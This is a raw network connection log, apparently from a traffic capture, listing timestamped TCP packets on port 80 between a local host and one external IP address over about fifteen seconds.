Apr 29, 2024 01:03:45.900039911 CEST	80	49816	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:45.900090933 CEST	49815	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:45.900168896 CEST	49816	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:45.900266886 CEST	49816	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:46.010561943 CEST	80	49816	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:46.010709047 CEST	80	49816	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:46.010993004 CEST	49816	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:46.163131952 CEST	80	49816	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:46.408499002 CEST	80	49816	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:46.408720970 CEST	80	49816	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:46.408890009 CEST	49816	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:46.530853987 CEST	49816	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:46.531559944 CEST	49817	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:46.641540051 CEST	80	49817	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:46.642972946 CEST	80	49816	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:46.643182039 CEST	49816	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:46.643186092 CEST	49817	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:46.643316984 CEST	49817	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:46.753217936 CEST	80	49817	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:46.754026890 CEST	80	49817	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:46.754205942 CEST	49817	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:46.906109095 CEST	80	49817	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:47.140896082 CEST	80	49817	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:47.140955925 CEST	80	49817	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:47.141036034 CEST	49817	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:47.265115023 CEST	49817	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:47.265866995 CEST	49818	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:47.375838041 CEST	80	49817	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:47.375976086 CEST	49817	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:47.376168013 CEST	80	49818	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:47.376528978 CEST	49818	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:47.376698017 CEST	49818	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:47.486952066 CEST	80	49818	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:47.487276077 CEST	80	49818	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:47.487468958 CEST	49818	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:47.639856100 CEST	80	49818	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:47.881795883 CEST	80	49818	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:47.881829977 CEST	80	49818	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:47.881906986 CEST	49818	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:47.998752117 CEST	49818	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:47.999456882 CEST	49819	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:48.109232903 CEST	80	49819	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:48.109316111 CEST	49819	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:48.109529018 CEST	49819	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:48.109901905 CEST	80	49818	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:48.109946966 CEST	49818	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:48.219161034 CEST	80	49819	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:48.219518900 CEST	80	49819	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:48.219698906 CEST	49819	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:48.285342932 CEST	49820	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:48.371691942 CEST	80	49819	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:48.395364046 CEST	80	49820	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:48.395471096 CEST	49820	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:48.395636082 CEST	49820	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:48.505321980 CEST	80	49820	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:48.505378008 CEST	80	49820	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:48.505609989 CEST	49820	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:48.615345001 CEST	80	49820	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:48.633904934 CEST	80	49819	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:48.633943081 CEST	80	49819	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:48.634008884 CEST	49819	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:48.750737906 CEST	49819	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:48.751467943 CEST	49821	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:48.779109001 CEST	80	49820	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:48.779149055 CEST	80	49820	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:48.779222012 CEST	49820	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:48.860971928 CEST	80	49819	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:48.861062050 CEST	49819	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:48.861819983 CEST	80	49821	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:48.861885071 CEST	49821	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:48.862005949 CEST	49821	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:48.972439051 CEST	80	49821	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:48.973093033 CEST	80	49821	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:48.973232031 CEST	49821	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:49.123949051 CEST	80	49821	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:49.372044086 CEST	80	49821	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:49.372126102 CEST	80	49821	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:49.372212887 CEST	49821	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:49.499782085 CEST	49820	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:49.499864101 CEST	49821	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:49.500704050 CEST	49822	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:49.610091925 CEST	80	49820	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:49.611004114 CEST	80	49822	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:49.611088991 CEST	80	49821	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:49.611105919 CEST	49820	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:49.611128092 CEST	49822	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:49.611156940 CEST	49821	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:49.611337900 CEST	49822	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:49.721647024 CEST	80	49822	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:49.722054005 CEST	80	49822	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:49.723978043 CEST	49822	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:49.875973940 CEST	80	49822	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:50.139683008 CEST	80	49822	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:50.139746904 CEST	80	49822	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:50.139808893 CEST	49822	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:50.264492035 CEST	49822	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:50.265181065 CEST	49823	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:50.375454903 CEST	80	49822	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:50.375483990 CEST	80	49823	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:50.375544071 CEST	49822	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:50.375566959 CEST	49823	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:50.375750065 CEST	49823	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:50.485999107 CEST	80	49823	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:50.486210108 CEST	80	49823	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:50.486435890 CEST	49823	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:50.637231112 CEST	80	49823	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:50.784604073 CEST	80	49823	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:50.784636974 CEST	80	49823	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:50.784774065 CEST	49823	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:50.913104057 CEST	49823	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:50.914233923 CEST	49824	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:51.024538040 CEST	80	49823	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:51.024566889 CEST	80	49824	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:51.024630070 CEST	49823	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:51.024683952 CEST	49824	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:51.024851084 CEST	49824	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:51.135101080 CEST	80	49824	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:51.135338068 CEST	80	49824	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:51.138650894 CEST	49824	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:51.289310932 CEST	80	49824	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:51.422130108 CEST	80	49824	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:51.422162056 CEST	80	49824	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:51.422436953 CEST	49824	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:51.547955036 CEST	49824	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:51.548629045 CEST	49825	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:51.658670902 CEST	80	49824	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:51.658909082 CEST	49824	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:51.658999920 CEST	80	49825	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:51.659127951 CEST	49825	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:51.659262896 CEST	49825	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:51.769566059 CEST	80	49825	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:51.769864082 CEST	80	49825	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:51.770147085 CEST	49825	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:51.921303988 CEST	80	49825	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:52.065978050 CEST	80	49825	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:52.065999031 CEST	80	49825	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:52.066015005 CEST	80	49825	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:52.066049099 CEST	49825	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:52.214510918 CEST	49825	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:52.215452909 CEST	49826	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:52.325081110 CEST	80	49825	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:52.325153112 CEST	49825	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:52.325798035 CEST	80	49826	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:52.325866938 CEST	49826	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:52.325969934 CEST	49826	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:52.436163902 CEST	80	49826	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:52.436454058 CEST	80	49826	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:52.436634064 CEST	49826	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:52.587692976 CEST	80	49826	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:52.858836889 CEST	80	49826	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:52.858860970 CEST	80	49826	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:52.858925104 CEST	49826	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:52.986282110 CEST	49826	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:52.987086058 CEST	49827	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:53.097243071 CEST	80	49826	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:53.097376108 CEST	80	49827	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:53.097381115 CEST	49826	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:53.097455025 CEST	49827	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:53.097583055 CEST	49827	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:53.207782984 CEST	80	49827	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:53.208096027 CEST	80	49827	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:53.208275080 CEST	49827	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:53.360279083 CEST	80	49827	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:53.608973980 CEST	80	49827	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:53.609009027 CEST	80	49827	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:53.609074116 CEST	49827	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:53.739011049 CEST	49827	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:53.739846945 CEST	49828	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:53.785876989 CEST	49829	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:53.849416971 CEST	80	49828	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:53.849493980 CEST	49828	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:53.849731922 CEST	80	49827	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:53.849787951 CEST	49827	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:53.850121021 CEST	49828	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:53.896173000 CEST	80	49829	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:53.896390915 CEST	49829	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:53.896543026 CEST	49829	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:53.959635973 CEST	80	49828	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:53.960185051 CEST	80	49828	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:53.960455894 CEST	49828	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:54.006673098 CEST	80	49829	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:54.007102966 CEST	80	49829	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:54.007293940 CEST	49829	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:54.111686945 CEST	80	49828	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:54.117674112 CEST	80	49829	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:54.289509058 CEST	80	49829	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:54.289530993 CEST	80	49829	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:54.289586067 CEST	49829	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:54.343214989 CEST	80	49828	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:54.343231916 CEST	80	49828	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:54.343287945 CEST	49828	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:54.697503090 CEST	49828	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:54.697577953 CEST	49829	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:54.698216915 CEST	49830	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:54.808092117 CEST	80	49828	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:54.808538914 CEST	80	49830	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:54.808607101 CEST	49828	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:54.808645964 CEST	49830	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:54.808810949 CEST	49830	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:54.808839083 CEST	80	49829	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:54.811975956 CEST	49829	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:54.919123888 CEST	80	49830	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:54.919501066 CEST	80	49830	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:54.919682980 CEST	49830	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:55.071963072 CEST	80	49830	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:55.207971096 CEST	80	49830	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:55.208029032 CEST	80	49830	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:55.208096027 CEST	49830	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:55.329591990 CEST	49830	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:55.330971956 CEST	49831	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:55.440635920 CEST	80	49830	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:55.440711021 CEST	49830	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:55.440826893 CEST	80	49831	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:55.440903902 CEST	49831	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:55.441020966 CEST	49831	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:55.550846100 CEST	80	49831	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:55.551093102 CEST	80	49831	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:55.551382065 CEST	49831	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:55.702126026 CEST	80	49831	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:55.933593988 CEST	80	49831	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:55.933619022 CEST	80	49831	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:55.933669090 CEST	49831	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:56.077517986 CEST	49831	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:56.078288078 CEST	49832	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:56.188806057 CEST	80	49831	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:56.188832045 CEST	80	49832	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:56.188886881 CEST	49831	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:56.188941002 CEST	49832	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:56.189203024 CEST	49832	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:56.299550056 CEST	80	49832	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:56.299779892 CEST	80	49832	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:56.299901962 CEST	49832	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:56.451903105 CEST	80	49832	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:56.701553106 CEST	80	49832	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:56.701575994 CEST	80	49832	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:56.701591015 CEST	80	49832	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:56.701750040 CEST	49832	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:56.752794981 CEST	49832	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:56.841726065 CEST	49832	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:56.845808983 CEST	49833	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:56.952830076 CEST	80	49832	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:56.953032970 CEST	49832	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:56.956125975 CEST	80	49833	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:56.956213951 CEST	49833	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:56.956325054 CEST	49833	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:57.066591978 CEST	80	49833	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:57.066886902 CEST	80	49833	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:57.066999912 CEST	49833	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:57.218035936 CEST	80	49833	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:57.461447001 CEST	80	49833	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:57.461680889 CEST	80	49833	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:57.461888075 CEST	49833	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:57.577586889 CEST	49833	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:57.578105927 CEST	49834	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:57.687937975 CEST	80	49834	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:57.688019037 CEST	49834	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:57.688231945 CEST	49834	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:57.688406944 CEST	80	49833	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:57.688456059 CEST	49833	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:57.797960043 CEST	80	49834	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:57.798547983 CEST	80	49834	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:57.798777103 CEST	49834	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:57.950500965 CEST	80	49834	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:58.199419022 CEST	80	49834	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:58.199462891 CEST	80	49834	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:58.199743032 CEST	49834	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:58.336786985 CEST	49834	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:58.337487936 CEST	49835	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:58.447729111 CEST	80	49834	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:58.447922945 CEST	49834	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:58.448973894 CEST	80	49835	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:58.449053049 CEST	49835	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:58.449156046 CEST	49835	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:58.559508085 CEST	80	49835	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:58.559755087 CEST	80	49835	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:58.559880972 CEST	49835	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:58.712156057 CEST	80	49835	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:58.839001894 CEST	80	49835	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:58.839029074 CEST	80	49835	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:58.839082956 CEST	49835	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:58.956815958 CEST	49835	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:58.957475901 CEST	49836	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:59.067205906 CEST	80	49836	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:59.067430973 CEST	49836	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:59.067507029 CEST	49836	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:59.068346977 CEST	80	49835	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:59.068418026 CEST	49835	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:59.177351952 CEST	80	49836	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:59.177835941 CEST	80	49836	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:59.178149939 CEST	49836	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:59.300895929 CEST	49837	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:59.328279018 CEST	80	49836	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:59.410547972 CEST	80	49837	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:59.410629988 CEST	49837	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:59.410756111 CEST	49837	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:59.481829882 CEST	80	49836	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:59.481851101 CEST	80	49836	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:59.482101917 CEST	49836	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:59.520335913 CEST	80	49837	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:59.520783901 CEST	80	49837	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:59.521203995 CEST	49837	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:59.617599010 CEST	49836	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:59.618227959 CEST	49838	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:59.630816936 CEST	80	49837	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:59.727611065 CEST	80	49836	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:59.727665901 CEST	49836	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:59.727777004 CEST	80	49838	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:59.727833986 CEST	49838	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:59.727946043 CEST	49838	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:59.837456942 CEST	80	49838	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:59.838165998 CEST	80	49838	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:59.838382006 CEST	49838	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:59.912151098 CEST	80	49837	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:59.912199020 CEST	80	49837	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:59.912395000 CEST	49837	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:59.989528894 CEST	80	49838	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:00.262530088 CEST	80	49838	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:00.262603998 CEST	80	49838	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:00.262655973 CEST	49838	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:00.396425962 CEST	49837	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:00.396492004 CEST	49838	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:00.397134066 CEST	49839	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:00.506714106 CEST	80	49838	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:00.506771088 CEST	80	49837	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:00.506778002 CEST	49838	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:00.506825924 CEST	49837	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:00.507551908 CEST	80	49839	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:00.507631063 CEST	49839	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:00.507756948 CEST	49839	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:00.618056059 CEST	80	49839	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:00.618474960 CEST	80	49839	172.67.144.153	192.168.2.4
Apr 29, 2024 01:04:00.618757963 CEST	49839	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:04:00.769792080 CEST	80	49839	172.67.144.153	192.168.2.4
